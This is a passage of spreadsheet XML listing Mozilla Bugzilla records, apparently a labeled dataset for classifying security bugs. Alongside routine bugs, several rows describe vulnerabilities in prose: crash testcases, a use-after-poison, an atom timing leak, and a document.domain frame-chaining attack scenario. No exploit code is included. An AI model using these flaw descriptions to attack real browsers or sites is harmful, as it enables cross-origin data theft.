        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4651" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T4651" t="n">
        <v>1</v>
      </c>
      <c r="U4651" t="n">
        <v>0</v>
      </c>
      <c r="V4651" t="n">
        <v>23</v>
      </c>
      <c r="W4651" t="inlineStr">
        <is>
          <t>See testcase, which crashes current trunk build and Firefox 3 within 100ms.
http://crash-stats.mozilla.com/report/index/69096ca8-9fbd-11dd-9496-001a4bd43e5c?p=1
0  	xul.dll  	nsXULDocument::SynchronizeBroadcastListener  	 content/xul/document/src/nsXULDocument.cpp:703
1 	xul.dll 	nsTArray_base::SwapArrayElements 	obj-firefox/xpcom/build/nsTArray.cpp:205
2 	xul.dll 	nsXULDocument::EndUpdate 	content/xul/document/src/nsXULDocument.cpp:3271</t>
        </is>
      </c>
      <c r="X4651" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4652">
      <c r="A4652" t="n">
        <v>862185</v>
      </c>
      <c r="B4652" t="inlineStr">
        <is>
          <t>2013-04-15 19:16:52 -0700</t>
        </is>
      </c>
      <c r="C4652" t="inlineStr">
        <is>
          <t>Use-after-poison with -moz-column, fieldset</t>
        </is>
      </c>
      <c r="D4652" t="inlineStr">
        <is>
          <t>2014-10-24 18:31:05 -0700</t>
        </is>
      </c>
      <c r="E4652" t="n">
        <v>1</v>
      </c>
      <c r="F4652" t="n">
        <v>1</v>
      </c>
      <c r="G4652" t="n">
        <v>3</v>
      </c>
      <c r="H4652" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4652" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4652" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4652" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4652" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4652" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4652" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4652" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4652" t="inlineStr">
        <is>
          <t>[adv-main23+]</t>
        </is>
      </c>
      <c r="Q4652" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4652" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4652" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T4652" t="n">
        <v>1</v>
      </c>
      <c r="U4652" t="n">
        <v>0</v>
      </c>
      <c r="V4652" t="n">
        <v>13</v>
      </c>
      <c r="W4652" t="inlineStr">
        <is>
          <t>Created attachment 737793
testcase (crashes Firefox when loaded)
###!!! ASSERTION: this type of frame can't have overflow containers: '(aProperty != nsContainerFrame::OverflowContainersProperty() &amp;&amp; aProperty != nsContainerFrame::ExcessOverflowContainersProperty()) || IsFrameOfType(nsIFrame::eCanContainOverflowContainers)', file /Users/jruderman/trees/mozilla-central/layout/generic/nsContainerFrame.cpp, line 1458
Crash with nsFieldSetFrame::GetIntrinsicWidth calling nsLayoutUtils::IntrinsicForContainer.
Nightly: bp-9f41ac48-8362-4f07-84aa-837992130416</t>
        </is>
      </c>
      <c r="X4652" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4653">
      <c r="A4653" t="n">
        <v>1389283</v>
      </c>
      <c r="B4653" t="inlineStr">
        <is>
          <t>2017-08-10 15:12:19 -0700</t>
        </is>
      </c>
      <c r="C4653" t="inlineStr">
        <is>
          <t>[UITour] Highlighting appmenu items breaks click functionality of submenus</t>
        </is>
      </c>
      <c r="D4653" t="inlineStr">
        <is>
          <t>2017-10-11 08:01:10 -0700</t>
        </is>
      </c>
      <c r="E4653" t="n">
        <v>1</v>
      </c>
      <c r="F4653" t="n">
        <v>1</v>
      </c>
      <c r="G4653" t="n">
        <v>2</v>
      </c>
      <c r="H4653" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4653" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4653" t="inlineStr">
        <is>
          <t>Tours</t>
        </is>
      </c>
      <c r="K4653" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L4653" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4653" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4653" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4653" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4653" t="inlineStr">
        <is>
          <t>[photon-onboarding]</t>
        </is>
      </c>
      <c r="Q4653" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4653" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4653" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4653" t="n">
        <v>1</v>
      </c>
      <c r="U4653" t="n">
        <v>0</v>
      </c>
      <c r="V4653" t="n">
        <v>14</v>
      </c>
      <c r="W4653" t="inlineStr">
        <is>
          <t>Created attachment 8896022
library.mp4
This is probably going to take a video to fully explain...
STR:
1. Open the tour to the add-on panel (it really doesn't matter which one though).
2. Click the show add-ons in menu button
3. Instead of clicking on the highlighted add-ons item in the menu, accidentally click on the Library button.
Expected result: The library submenu should appear.
Actual result: The menu disappears. Clicking the show button again opens the menu with library button highlighted and none of the buttons in the menu work.
You then have to close the overlay to get out this situation. Opening the menu again shows the library button highlighted and the menu becomes responsive after a few clicks.
This will also happen if you accidentally click on some of the other menu items like Help or Web developer.</t>
        </is>
      </c>
      <c r="X4653" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4654">
      <c r="A4654" t="n">
        <v>794335</v>
      </c>
      <c r="B4654" t="inlineStr">
        <is>
          <t>2012-09-25 20:40:59 -0700</t>
        </is>
      </c>
      <c r="C4654" t="inlineStr">
        <is>
          <t>Can't run pushsnip for Thunderbird because of permissions on snippets/pushed</t>
        </is>
      </c>
      <c r="D4654" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:47 -0700</t>
        </is>
      </c>
      <c r="E4654" t="n">
        <v>1</v>
      </c>
      <c r="F4654" t="n">
        <v>1</v>
      </c>
      <c r="G4654" t="n">
        <v>5</v>
      </c>
      <c r="H4654" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4654" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4654" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4654" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4654" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4654" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4654" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4654" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4654" t="inlineStr"/>
      <c r="Q4654" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4654" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4654" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4654" t="n">
        <v>1</v>
      </c>
      <c r="U4654" t="n">
        <v>0</v>
      </c>
      <c r="V4654" t="n">
        <v>2</v>
      </c>
      <c r="W4654" t="inlineStr">
        <is>
          <t>Running /usr/bin/time -p -o /opt/aus2/snippets/pushed/Thunderbird-16.0b3-build1-test.time /usr/bin/rsync -PaO /opt/aus2/snippets/staging/Thunderbird-16.0b3-build1-test/Thunderbird /opt/aus2/incoming/3
/usr/bin/time: /opt/aus2/snippets/pushed/Thunderbird-16.0b3-build1-test.time: Permission denied</t>
        </is>
      </c>
      <c r="X4654" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4655">
      <c r="A4655" t="n">
        <v>15966</v>
      </c>
      <c r="B4655" t="inlineStr">
        <is>
          <t>1999-10-09 20:23:41 -0700</t>
        </is>
      </c>
      <c r="C4655" t="inlineStr">
        <is>
          <t>CC list is a set, not an unordered list.</t>
        </is>
      </c>
      <c r="D4655" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E4655" t="n">
        <v>1</v>
      </c>
      <c r="F4655" t="n">
        <v>1</v>
      </c>
      <c r="G4655" t="n">
        <v>4</v>
      </c>
      <c r="H4655" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4655" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4655" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4655" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4655" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4655" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4655" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4655" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4655" t="inlineStr"/>
      <c r="Q4655" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4655" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S4655" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T4655" t="n">
        <v>1</v>
      </c>
      <c r="U4655" t="n">
        <v>0</v>
      </c>
      <c r="V4655" t="n">
        <v>11</v>
      </c>
      <c r="W4655" t="inlineStr">
        <is>
          <t>Currently you can add someone's name to a cc list twice.  It happened to me the
recently.  I'm not sure whether you get two notifications, but either way it
makes unweildy cc lists even more unweildy.
It would be nice if duplicate names would be trimmed.  They should probably also
be sorted, both to aid searching, making trimming easier and reflect the fact
that the list is unsorted.
This would also (theoretically) prevent a change from being diffed when a name
was added to already existed.  This might be useful if bulk cc adds were added
(bug #12819).
A message saying that duplicates were removed should appear on the resultant
screen though.</t>
        </is>
      </c>
      <c r="X4655" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4656">
      <c r="A4656" t="n">
        <v>1344572</v>
      </c>
      <c r="B4656" t="inlineStr">
        <is>
          <t>2017-03-05 12:51:36 -0800</t>
        </is>
      </c>
      <c r="C4656" t="inlineStr">
        <is>
          <t>Teach beetmover to set Cache-Control header in latest directories</t>
        </is>
      </c>
      <c r="D4656" t="inlineStr">
        <is>
          <t>2017-05-12 08:03:09 -0700</t>
        </is>
      </c>
      <c r="E4656" t="n">
        <v>1</v>
      </c>
      <c r="F4656" t="n">
        <v>1</v>
      </c>
      <c r="G4656" t="n">
        <v>5</v>
      </c>
      <c r="H4656" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4656" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4656" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4656" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4656" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4656" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4656" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4656" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4656" t="inlineStr"/>
      <c r="Q4656" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4656" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4656" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4656" t="n">
        <v>1</v>
      </c>
      <c r="U4656" t="n">
        <v>0</v>
      </c>
      <c r="V4656" t="n">
        <v>12</v>
      </c>
      <c r="W4656" t="inlineStr">
        <is>
          <t>We replace files in directories like 
  firefox/nightly/latest-mozilla-central
  firefox/nightly/latest-mozilla-central-l10n
   mobile/nightly/latest-mozilla-central-android-api-15
   mobile/nightly/latest-mozilla-central-android-api-15-l10n
   mobile/nightly/latest-mozilla-central-android-x86
and similar for mozilla-aurora. We serve new installs out of these directories, and the default caching on archive.m.o is ~ 1 week, so we need to set a special header on the S3 key so that the CDN doesn't serve old content. This shows up like this:
$ curl -IL "https://download.mozilla.org/?product=firefox-nightly-latest-l10n-ssl&amp;os=osx&amp;lang=ar"
HTTP/1.1 302 Found
Cache-Control: max-age=60
Content-Length: 139
Content-Type: text/html; charset=utf-8
Date: Sun, 05 Mar 2017 20:29:06 GMT
Location: https://download-installer.cdn.mozilla.net/pub/firefox/nightly/latest-mozilla-central-l10n/firefox-54.0a1.ar.mac.dmg
Connection: keep-alive
HTTP/1.1 200 OK
Content-Type: application/x-apple-diskimage
Content-Length: 74982443
Connection: keep-alive
Date: Sun, 05 Mar 2017 20:29:08 GMT
x-amz-replication-status: COMPLETED
Last-Modified: Sun, 05 Mar 2017 12:55:46 GMT
ETag: "ce5df8d4ab633619274ec069dbf6b659"
Cache-Control: max-age=3600              &lt;--------------------- this guy, right here
x-amz-version-id: KlmjjZYthqb.Uo6scBhzrR5zAG0pU6Xc
Accept-Ranges: bytes
Server: AmazonS3
Via: 1.1 b4479f202bc7050d8c458896bb43d335.cloudfront...
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: cpLJ6ghvaXbrPiGlX3mObqiMSFBTgqxOAJqhxTdpRPTOsM4oCbKuKw==
The Cache-Control header is missing in requests for Firefox linux and linux64, and also for Fennec. Examples of places making these links:
* Firefox - https://www.mozilla.org/en-US/firefox/nightly/all/ to the download.m.o example
* Fennec - https://www.mozilla.org/en-US/firefox/channel/android/ pointing to
https://archive.mozilla.org/pub/mobile/nightly/latest-mozilla-central-android-api-15/fennec-54.0a1.multi.android-arm.apk.
So, we should teach beetmover to include CacheControl when adding new keys to S3 for paths including latest-*. FWIW, the old upload system (post_upload) uses a regexp of "^pub/.*/nightly/latest.*".</t>
        </is>
      </c>
      <c r="X4656" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4657">
      <c r="A4657" t="n">
        <v>904518</v>
      </c>
      <c r="B4657" t="inlineStr">
        <is>
          <t>2013-08-13 02:00:38 -0700</t>
        </is>
      </c>
      <c r="C4657" t="inlineStr">
        <is>
          <t>Show low storage space error for SD cards</t>
        </is>
      </c>
      <c r="D4657" t="inlineStr">
        <is>
          <t>2014-06-26 13:38:46 -0700</t>
        </is>
      </c>
      <c r="E4657" t="n">
        <v>1</v>
      </c>
      <c r="F4657" t="n">
        <v>1</v>
      </c>
      <c r="G4657" t="n">
        <v>6</v>
      </c>
      <c r="H4657" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4657" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4657" t="inlineStr">
        <is>
          <t>Gaia::Camera</t>
        </is>
      </c>
      <c r="K4657" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4657" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4657" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4657" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4657" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4657" t="inlineStr">
        <is>
          <t>[TD-76560]</t>
        </is>
      </c>
      <c r="Q4657" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4657" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4657" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4657" t="n">
        <v>1</v>
      </c>
      <c r="U4657" t="n">
        <v>0</v>
      </c>
      <c r="V4657" t="n">
        <v>25</v>
      </c>
      <c r="W4657" t="inlineStr">
        <is>
          <t>1. Title : device storage free space check error 
2. precondition : internal storage full. free space 0.
                  Default media location setting : internal
                  SD card storage insert.
3. STR
   Start camera app -&gt; recording video -&gt; can't save video file.
   Start camera app -&gt; take picture -&gt; Picture not saved popup.
Expected :
   if internal storage is full. camera app how memory full pop-up.
Actual:
   camera can take picture. 
Repro frequency: 5/5 100%
Test Version Info.
Device : leo
Gaia revision = "c60e3507d9df160e006d2e25967d26df2dc543cb"
Gecko revision = "b70519784430835a3e5a1d417eb3a818340c1c1c"</t>
        </is>
      </c>
      <c r="X4657" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4658">
      <c r="A4658" t="n">
        <v>1059921</v>
      </c>
      <c r="B4658" t="inlineStr">
        <is>
          <t>2014-08-28 10:37:59 -0700</t>
        </is>
      </c>
      <c r="C4658" t="inlineStr">
        <is>
          <t>(fx-l10n-sl) Add 'sl' to the Firefox Nightly build</t>
        </is>
      </c>
      <c r="D4658" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E4658" t="n">
        <v>1</v>
      </c>
      <c r="F4658" t="n">
        <v>1</v>
      </c>
      <c r="G4658" t="n">
        <v>5</v>
      </c>
      <c r="H4658" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4658" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4658" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4658" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4658" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4658" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4658" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4658" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4658" t="inlineStr">
        <is>
          <t>[l10n]</t>
        </is>
      </c>
      <c r="Q4658" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4658" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4658" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4658" t="n">
        <v>1</v>
      </c>
      <c r="U4658" t="n">
        <v>0</v>
      </c>
      <c r="V4658" t="n">
        <v>9</v>
      </c>
      <c r="W4658" t="inlineStr">
        <is>
          <t>We need to add 'sl' to the Firefox Nightly l10n builds.</t>
        </is>
      </c>
      <c r="X4658" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4659">
      <c r="A4659" t="n">
        <v>946733</v>
      </c>
      <c r="B4659" t="inlineStr">
        <is>
          <t>2013-12-05 07:21:34 -0800</t>
        </is>
      </c>
      <c r="C4659" t="inlineStr">
        <is>
          <t>Crash in nr_turn_stun_ctx_cb</t>
        </is>
      </c>
      <c r="D4659" t="inlineStr">
        <is>
          <t>2016-06-23 08:07:54 -0700</t>
        </is>
      </c>
      <c r="E4659" t="n">
        <v>1</v>
      </c>
      <c r="F4659" t="n">
        <v>1</v>
      </c>
      <c r="G4659" t="n">
        <v>3</v>
      </c>
      <c r="H4659" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4659" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4659" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K4659" t="inlineStr">
        <is>
          <t>25 Branch</t>
        </is>
      </c>
      <c r="L4659" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4659" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4659" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4659" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4659" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q4659" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4659" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4659" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T4659" t="n">
        <v>1</v>
      </c>
      <c r="U4659" t="n">
        <v>0</v>
      </c>
      <c r="V4659" t="n">
        <v>47</v>
      </c>
      <c r="W4659" t="inlineStr">
        <is>
          <t>So, I was doing the following thing, while using https://opentokrtc.com/, in the Paris office:
- A Linux machine, using a wired connection, running Chromium 30.0.1599.114 and today's Firefox Nightly. One tab in Firefox, two tabs in Chrome, all in the same room.
- A macbook, running a build from yesterday of Chromium, connected to the "Mozilla" wifi network, also in the same room.
All the browsers were connected to a room (four participants). After reloading multiple times the Chrome tabs, I tried to reload the Firefox tab, and after a couple seconds trying to connect, it crashed.
The bug report with stacks:
https://crash-stats.mozilla.com/report/index/920a4655-1911-4b63-b005-d9f582131205</t>
        </is>
      </c>
      <c r="X4659" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4660">
      <c r="A4660" t="n">
        <v>204903</v>
      </c>
      <c r="B4660" t="inlineStr">
        <is>
          <t>2003-05-08 11:05:55 -0700</t>
        </is>
      </c>
      <c r="C4660" t="inlineStr">
        <is>
          <t>Cannot get buglists with certain search criteria matching NULL alias, no qa_contact, or no cc members</t>
        </is>
      </c>
      <c r="D4660" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:36 -0800</t>
        </is>
      </c>
      <c r="E4660" t="n">
        <v>1</v>
      </c>
      <c r="F4660" t="n">
        <v>1</v>
      </c>
      <c r="G4660" t="n">
        <v>4</v>
      </c>
      <c r="H4660" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4660" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4660" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4660" t="inlineStr">
        <is>
          <t>2.17.4</t>
        </is>
      </c>
      <c r="L4660" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4660" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4660" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4660" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4660" t="inlineStr"/>
      <c r="Q4660" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4660" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4660" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4660" t="n">
        <v>1</v>
      </c>
      <c r="U4660" t="n">
        <v>1</v>
      </c>
      <c r="V4660" t="n">
        <v>27</v>
      </c>
      <c r="W4660" t="inlineStr">
        <is>
          <t>when search for bugs with a null alias (or bugs with an alias not matching
something), it is currently impossible to match any bugs having no alias with
alias-based criteria.
All negative boolean queries (does not contain, does not match, etc...) should
match records that match the criteria OR records that are NULL.</t>
        </is>
      </c>
      <c r="X4660" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4661">
      <c r="A4661" t="n">
        <v>1317936</v>
      </c>
      <c r="B4661" t="inlineStr">
        <is>
          <t>2016-11-16 01:28:22 -0800</t>
        </is>
      </c>
      <c r="C4661" t="inlineStr">
        <is>
          <t>Fix cross-origin information leak from shared atoms</t>
        </is>
      </c>
      <c r="D4661" t="inlineStr">
        <is>
          <t>2017-02-09 08:03:52 -0800</t>
        </is>
      </c>
      <c r="E4661" t="n">
        <v>1</v>
      </c>
      <c r="F4661" t="n">
        <v>1</v>
      </c>
      <c r="G4661" t="n">
        <v>3</v>
      </c>
      <c r="H4661" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4661" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4661" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4661" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4661" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4661" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4661" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4661" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4661" t="inlineStr">
        <is>
          <t>[adv-main50.1+][adv-ESR45.6+] Disclosure date ~Jan 21 2017 (note Fx51 scheduled for Jan 24)</t>
        </is>
      </c>
      <c r="Q4661" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4661" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4661" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T4661" t="n">
        <v>1</v>
      </c>
      <c r="U4661" t="n">
        <v>0</v>
      </c>
      <c r="V4661" t="n">
        <v>34</v>
      </c>
      <c r="W4661" t="inlineStr">
        <is>
          <t>JS code can use a Map/Set timing attack to determine whether an atom is used by another compartment/zone. See bug 1312001.
The plan (bug 1312001 comment 13) is to add a hash code to atoms, to avoid leaking information about the atom's address.</t>
        </is>
      </c>
      <c r="X4661" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4662">
      <c r="A4662" t="n">
        <v>655649</v>
      </c>
      <c r="B4662" t="inlineStr">
        <is>
          <t>2011-05-08 20:50:06 -0700</t>
        </is>
      </c>
      <c r="C4662" t="inlineStr">
        <is>
          <t>Script access checks should use effective script origin, not origin</t>
        </is>
      </c>
      <c r="D4662" t="inlineStr">
        <is>
          <t>2014-07-03 22:16:01 -0700</t>
        </is>
      </c>
      <c r="E4662" t="n">
        <v>1</v>
      </c>
      <c r="F4662" t="n">
        <v>1</v>
      </c>
      <c r="G4662" t="n">
        <v>3</v>
      </c>
      <c r="H4662" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4662" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4662" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4662" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4662" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4662" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4662" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4662" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4662" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+] (sg:high against sites using document.domain)[cpg]</t>
        </is>
      </c>
      <c r="Q4662" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4662" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4662" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T4662" t="n">
        <v>1</v>
      </c>
      <c r="U4662" t="n">
        <v>0</v>
      </c>
      <c r="V4662" t="n">
        <v>41</v>
      </c>
      <c r="W4662" t="inlineStr">
        <is>
          <t>The HTML5 spec requires that browsers raise a SECURITY_ERR exception when members of the Window object (e.g. localStorage) are accessed by scripts that have a different effective script origin. Firefox allows access by scripts that have the same origin OR the same effective script origin.
Here's a scenario where the new behavior has an observable security impact:
https://attacker.cmu.edu/ wants to access the localStorage of https://weblogin.cmu.edu/. Assume that there exists a page at https://help.weblogin.cmu.edu/ that sets document.domain = 'cmu.edu' and that https://weblogin.cmu.edu/ sets its document.domain to 'weblogin.cmu.edu'.
In Chrome/Safari/IE8, I claim that the attacker can't do it. They can inject script into the one help.weblogin.cmu.edu page that set document.domain to 'cmu.edu' but this page can't script other help.weblogin.cmu.edu pages nor can it script weblogin.cmu.edu.
In Firefox 4, the attack works. The frame hierarchy looks like this:
https://attacker.cmu.edu/
   ---&gt; https://help.weblogin.cmu.edu/
       ---&gt; https://help.weblogin.cmu.edu/blah
           ---&gt; https://weblogin.cmu.edu/
The top frame can script the second frame by setting document.domain to 'cmu.edu', the second frame can script the third due to Firefox's non-standard access check, the third frame can script the fourth by setting its document.domain to 'weblogin.cmu.edu'
There may be less contrived scenarios; this is what I could come up with after thinking about it for a few minutes. I'm setting the security flag on this bug because I haven't thought through all the ramifications of the new origin enforcement behavior, but it's fine to clear it if you feel the risk is low.
Incidentally, this attack also worked in IE7, but for a different reason. IE7 allows 'help.weblogin.cmu.edu' to set its document.domain to 'weblogin.cmu.edu' after setting it to 'cmu.edu'. This was fixed in IE8, which now prohibits setting document.domain to a longer value than its current value.
http://www.adambarth.com/papers/2009/barth-weinberger-song.pdf has a great explanation of how to do the HTML5 script access check quickly. The key is to get the access check down to a single pointer comparison in the common case.</t>
        </is>
      </c>
      <c r="X4662" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4663">
      <c r="A4663" t="n">
        <v>543436</v>
      </c>
      <c r="B4663" t="inlineStr">
        <is>
